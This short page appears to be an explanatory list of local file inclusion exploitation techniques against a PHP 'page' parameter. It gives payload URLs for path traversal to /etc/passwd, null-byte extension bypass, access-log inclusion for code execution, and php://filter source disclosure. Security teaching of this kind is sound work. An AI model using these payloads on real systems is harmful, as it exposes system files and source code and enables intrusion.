Skip to content

Exploitation

  1. Basic LFI Attack:

  2. An attacker can manipulate the input to include files from the server. For example: 

    http://example.com/index.php?page=../../etc/passwd

  3. Null Byte Injection:

  4. In some cases, appending a null byte (%00) can bypass file extension checks: 

    http://example.com/index.php?page=../../etc/passwd%00

  5. Log File Inclusion:

  6. If the application logs user input, an attacker can include log files to execute arbitrary code: 

    http://example.com/index.php?page=/var/log/apache2/access.log

  7. PHP Wrappers:

  8. Using PHP wrappers (e.g., php://filter) to read files: 
    http://example.com/index.php?page=php://filter/read=convert.base64-encode/resource=index.php